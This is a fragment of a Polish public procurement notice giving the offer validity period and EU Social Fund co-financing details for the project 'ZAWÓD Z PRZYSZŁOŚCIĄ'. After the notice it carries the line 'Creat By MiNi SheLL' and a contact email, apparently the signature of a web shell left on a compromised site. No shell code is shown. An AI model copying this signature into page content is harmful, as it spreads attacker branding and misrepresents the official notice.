<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt ZAWÓD Z PRZYSZŁOŚCIĄ współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Podziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com